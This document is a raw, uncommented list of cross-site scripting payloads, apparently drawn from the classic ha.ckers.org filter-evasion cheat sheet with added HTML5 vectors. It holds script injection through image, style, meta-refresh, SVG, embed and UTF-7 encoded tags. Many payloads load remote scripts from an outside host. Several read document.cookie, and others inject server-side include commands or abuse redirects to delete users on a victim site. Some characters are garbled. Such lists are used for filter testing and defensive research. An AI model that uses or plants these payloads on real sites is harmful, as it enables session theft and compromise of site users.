ONLOAD=alert('XSS')><IMG DYNSRC=\"javascript:alert('XSS')\"><IMG LOWSRC=\"javascript:alert('XSS')\"><BGSOUND SRC=\"javascript:alert('XSS');\"><BR SIZE=\"&{alert('XSS')}\"><LAYER SRC=\"http://ha.ckers.org/scriptlet.html\"></LAYER><LINK REL=\"stylesheet\" HREF=\"javascript:alert('XSS');\"><LINK REL=\"stylesheet\" HREF=\"http://ha.ckers.org/xss.css\"><STYLE>@import'http://ha.ckers.org/xss.css';</STYLE><META HTTP-EQUIV=\"Link\" Content=\"<http://ha.ckers.org/xss.css>; REL=stylesheet\"><STYLE>BODY{-moz-binding:url(\"http://ha.ckers.org/xssmoz.xml#xss\")}</STYLE><XSS STYLE=\"behavior: url(xss.htc);\"><STYLE>li {list-style-image: url(\"javascript:alert('XSS')\");}</STYLE><UL><LI>XSS<IMG SRC='vbscript:msgbox(\"XSS\")'><IMG SRC=\"mocha:[code]\"><IMG SRC=\"livescript:[code]\">scriptualert(EXSSE)/scriptu<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\"><META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\"><META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert('XSS');\"<IFRAME SRC=\"javascript:alert('XSS');\"></IFRAME><FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET><TABLE BACKGROUND=\"javascript:alert('XSS')\"><TABLE><TD BACKGROUND=\"javascript:alert('XSS')\"><DIV STYLE=\"background-image: url(javascript:alert('XSS'))\"><DIV STYLE=\"background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029\"><DIV STYLE=\"background-image: url(javascript:alert('XSS'))\"><DIV STYLE=\"width: expression(alert('XSS'));\"><STYLE>@im\port'\ja\vasc\ript:alert(\"XSS\")';</STYLE><IMG STYLE=\"xss:expr/*XSS*/ession(alert('XSS'))\"><XSS STYLE=\"xss:expression(alert('XSS'))\">exp/*<A STYLE='no\xss:noxss(\"*//*\");xss:ex/*XSS*//*/*/pression(alert(\"XSS\"))'><STYLE TYPE=\"text/javascript\">alert('XSS');</STYLE><STYLE>.XSS{background-image:url(\"javascript:alert('XSS')\");}</STYLE><A class="XSS"></A><STYLE type=\"text/css\">BODY{background:url(\"javascript:alert('XSS')\")}</STYLE><!--[if gte IE 4]><SCRIPT>alert('XSS');</SCRIPT><![endif]--><BASE HREF=\"javascript:alert('XSS');//\"><OBJECT TYPE=\"text/x-scriptlet\" DATA=\"http://ha.ckers.org/scriptlet.html\"></OBJECT><OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT><EMBED SRC=\"http://ha.ckers.org/xss.swf\" AllowScriptAccess=\"always\"></EMBED><EMBED SRC=\"data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\" type=\"image/svg+xml\" AllowScriptAccess=\"always\"></EMBED>a=\"get\";b=\"URL(\\"\";c=\"javascript:\";d=\"alert('XSS');\\")\";eval(a+b+c+d);<HTML xmlns:xss><?import namespace=\"xss\" implementation=\"http://ha.ckers.org/xss.htc\"><xss:xss>XSS</xss:xss></HTML><XML ID=I><X><C><![CDATA[<IMG SRC=\"javas]]><![CDATA[cript:alert('XSS');\">]]></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN><XML ID=\"xss\"><I><B><IMG SRC=\"javas<!-- -->cript:alert('XSS')\"></B></I></XML><SPAN DATASRC=\"#xss\" DATAFLD=\"B\" DATAFORMATAS=\"HTML\"></SPAN><XML SRC=\"xsstest.xml\" ID=I></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN><HTML><BODY><?xml:namespace prefix=\"t\" ns=\"urn:schemas-microsoft-com:time\"><?import namespace=\"t\" implementation=\"#default#time2\"><t:set attributeName=\"innerHTML\" to=\"XSS<SCRIPT DEFER>alert("XSS")</SCRIPT>\"></BODY></HTML><SCRIPT SRC=\"http://ha.ckers.org/xss.jpg\"></SCRIPT><!--#exec cmd=\"/bin/echo '<SCR'\"--><!--#exec cmd=\"/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'\"--><? echo('<SCR)';echo('IPT>alert(\"XSS\")</SCRIPT>'); ?><IMG SRC=\"http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode\">Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser<META HTTP-EQUIV=\"Set-Cookie\" Content=\"USERID=<SCRIPT>alert('XSS')</SCRIPT>\"><HEAD><META HTTP-EQUIV=\"CONTENT-TYPE\" CONTENT=\"text/html; charset=UTF-7\"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-<SCRIPT a=\">\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT><SCRIPT =\">\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT><SCRIPT a=\">\" '' SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT><SCRIPT \"a='>'\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT><SCRIPT a=`>` SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT><SCRIPT a=\">'>\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT><SCRIPT>document.write(\"<SCRI\");</SCRIPT>PT SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT><A HREF=\"http://66.102.7.147/\">XSS</A><A HREF=\"http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D\">XSS</A><A HREF=\"http://1113982867/\">XSS</A><A HREF=\"http://0x42.0x0000066.0x7.0x93/\">XSS</A><A HREF=\"http://0102.0146.0007.00000223/\">XSS</A><A HREF=\"htt p://6 6.000146.0x7.147/\">XSS</A><A HREF=\"//www.google.com/\">XSS</A><A HREF=\"//google\">XSS</A><A HREF=\"http://ha.ckers.org@google\">XSS</A><A HREF=\"http://google:ha.ckers.org\">XSS</A><A HREF=\"http://google.com/\">XSS</A><A HREF=\"http://www.google.com./\">XSS</A><A HREF=\"javascript:document.location='http://www.google.com/'\">XSS</A><A HREF=\"http://www.gohttp://www.google.com/ogle.com/\">XSS</A><%3C<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<\x3c\x3C\u003c\u003C<iframe src=http://ha.ckers.org/scriptlet.html><IMG SRC=\"javascript:alert('XSS')\"<SCRIPT SRC=//ha.ckers.org/.js><SCRIPT SRC=http://ha.ckers.org/xss.js?<B><<SCRIPT>alert(\"XSS\");//<</SCRIPT><SCRIPT/SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(\"XSS\")><SCRIPT/XSS SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT><IMG SRC=\" javascript:alert('XSS');\">perl -e 'print \"<SCR\0IPT>alert(\\"XSS\\")</SCR\0IPT>\";' > outperl -e 'print \"<IMG SRC=java\0script:alert(\\"XSS\\")>\";' > out<IMG SRC=\"jav
ascript:alert('XSS');\"><IMG SRC=\"jav
ascript:alert('XSS');\"><IMG SRC=\"jav	ascript:alert('XSS');\"><IMG SRC=javascript:alert('XSS')><IMG SRC=javascript:alert('XSS')><IMG SRC=javascript:alert('XSS')><IMG SRC=javascript:alert(String.fromCharCode(88,83,83))><IMG \"\"\"><SCRIPT>alert(\"XSS\")</SCRIPT>\"><IMG SRC=`javascript:alert(\"RSnake says, 'XSS'\")`><IMG SRC=javascript:alert("XSS")><IMG SRC=JaVaScRiPt:alert('XSS')><IMG SRC=javascript:alert('XSS')><IMG SRC=\"javascript:alert('XSS');\"><SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'';!--\"<XSS>=&{()}';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//\\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>\">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>'';!--"<XSS>=&{()}<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT><IMG SRC="javascript:alert('XSS');"><IMG SRC=javascript:alert('XSS')><IMG SRC=javascrscriptipt:alert('XSS')><IMG SRC=JaVaScRiPt:alert('XSS')><IMG """><SCRIPT>alert("XSS")</SCRIPT>"><IMG SRC="  javascript:alert('XSS');"><SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT><SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT><<SCRIPT>alert("XSS");//<</SCRIPT><SCRIPT>a=/XSS/alert(a.source)</SCRIPT>\";alert('XSS');//</TITLE><SCRIPT>alert("XSS");</SCRIPT>ŒscriptŸalert(¢XSS¢)Œ/scriptŸ<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');"><IFRAME SRC="javascript:alert('XSS');"></IFRAME><FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET><TABLE BACKGROUND="javascript:alert('XSS')"><TABLE><TD BACKGROUND="javascript:alert('XSS')"><DIV STYLE="background-image: url(javascript:alert('XSS'))"><DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"><DIV STYLE="width: expression(alert('XSS'));"><STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE><IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))"><XSS STYLE="xss:expression(alert('XSS'))">exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(alert("XSS"))'><EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>a="get";b="URL(ja\"";c="vascr";d="ipt:ale";e="rt('XSS');\")";eval(a+b+c+d+e);<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT><HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>alert("XSS")</SCRIPT>"></BODY></HTML><SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT><form id="test" /><button form="test" formaction="javascript:alert(123)">TESTHTML5FORMACTION<form><button formaction="javascript:alert(123)">crosssitespt<frameset οnlοad=alert(123)><!--<img src="--><img src=x οnerrοr=alert(123)//"><style><img src="</style><img src=x οnerrοr=alert(123)//"><object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="><embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="><embed src="javascript:alert(1)"><? foo="><script>alert(1)</script>"><! foo="><script>alert(1)</script>"></ foo="><script>alert(1)</script>"><script>({0:#0=alert/#0#/#0#(123)})</script><script>ReferenceError.prototype.__defineGetter__('name', function(){alert(123)}),x</script><script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('alert(1)')()</script><script src="#">{alert(1)}</script>;1<script>crypto.generateCRMFRequest('CN=0',0,0,null,'alert(1)',384,null,'rsa-dual-use')</script><svg xmlns="#"><script>alert(1)</script></svg><svg οnlοad="javascript:alert(123)" xmlns="#"></svg><iframe xmlns="#" src="javascript:alert(1)"></iframe>+ADw-script+AD4-alert(document.location)+ADw-/script+AD4-%2BADw-script+AD4-alert(document.location)%2BADw-/script%2BAD4-+ACIAPgA8-script+AD4-alert(document.location)+ADw-/script+AD4APAAi-%2BACIAPgA8-script%2BAD4-alert%28document.location%29%2BADw-%2Fscript%2BAD4APAAi-%253cscript%253ealert(document.cookie)%253c/script%253e><s%2bcript>alert(document.cookie)</script>><ScRiPt>alert(document.cookie)</script>><<script>alert(document.cookie);//<</script>foo%00<script>alert(document.cookie)</script><scr<script>ipt>alert(document.cookie)</scr</script>ipt>%22/%3E%3CBODY%20οnlοad=document.write(%22%3Cs%22%2b%22cript%20src=http://my.box.com/xss.js%3E%3C/script%3E%22)%3E; alert(document.cookie); var foo=foo\; alert(document.cookie);//;</script><script >alert(document.cookie)</script><img src=asdf οnerrοr=alert(document.cookie)><BODY ONLOAD=alert(XSS)><script>alert(1)</script>"><script>alert(String.fromCharCode(66, 108, 65, 99, 75, 73, 99, 101))</script><video src=1 οnerrοr=alert(1)><audio src=1 οnerrοr=alert(1)>